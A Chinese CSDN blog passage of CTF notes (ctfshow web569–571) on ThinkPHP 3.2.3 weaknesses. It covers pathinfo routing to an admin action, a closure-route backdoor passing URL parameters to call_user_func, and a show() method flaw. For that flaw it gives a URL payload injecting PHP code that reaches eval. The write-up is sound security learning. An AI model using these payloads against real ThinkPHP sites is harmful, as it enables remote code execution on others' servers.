ctfshow- thinkphp专题笔记一

这篇博客详细记录了ThinkPHP 3.2.x版本中的多个安全漏洞,包括pathinfo利用、闭包路由后门、show方法引发的命令执行、debug模式下的日志文件泄露、SQL注入问题以及反序列化POP链等,通过实例演示了攻击者可能利用的payload和漏洞原理。
摘要由CSDN通过智能技术生成

TP3.23完全开发手册

web569(pathinfo的运用)

在这里插入图片描述TP3.2.3开发手册-URL模式
入口文件是应用的单一入口,对应用的所有请求都定向到应用入口文件,系统会从URL参数中解析当前请求的模块、控制器和操作:

http://serverName/index.php/模块/控制器/操作

payload:

http://serverName/index.php/Admin/Login/ctfshowLogin

web570(闭包路由后门)

在这里插入图片描述
审计提供的Application文件
在这里插入图片描述这里详情TP3.2.3开发手册-闭包支持

    'ctfshow/:f/:a' =>function($f,$a){
   
    	call_user_func($f, $a);
    	}
    )
);

在这里插入图片描述

web571(show方法导致的命令执行)

看了师傅们写的wp自己测试了下
将附件的Application替代thinkphp3.23里面的Application
先看下效果
在这里插入图片描述接下来就是找下原理
我们要分析一下show这个函数的走向,在vscode上下断点
在这里插入图片描述

然后访问

http://127.0.0.1/thinkphp3.23/index.php/Home/Index/index?n=<?php phpinfo();?>

我们传的参数n是content变量
先进入show函数->display函数->fetch函数->eval函数执行content

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

{Yasso}

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值